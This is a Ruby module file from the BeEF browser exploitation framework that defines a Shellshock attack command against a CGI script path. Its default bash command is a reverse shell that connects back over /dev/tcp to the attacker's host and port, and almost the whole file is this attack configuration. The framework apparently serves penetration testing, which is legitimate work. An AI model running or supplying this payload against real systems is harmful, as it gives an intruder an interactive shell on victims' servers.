27 lines
949 B
Ruby
27 lines
949 B
Ruby
#
|
|
# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
class Shell_shocked < BeEF::Core::Command
|
|
|
|
def self.options
|
|
configuration = BeEF::Core::Configuration.instance
|
|
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
|
|
lhost = "LHOST" if lhost == "0.0.0.0"
|
|
payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"
|
|
|
|
return [
|
|
{'name' => 'Target', 'description' => 'Vulnerable cgi script path', 'ui_label' => 'Target', 'value' => 'http://127.0.0.1/cgi-bin/test.cgi'},
|
|
{ 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
|
|
{'name' => 'Bash_Command', 'description' => 'the command to execute', 'ui_label' => 'Bash Command', 'value' => payload}
|
|
]
|
|
end
|
|
|
|
|
|
def post_execute
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|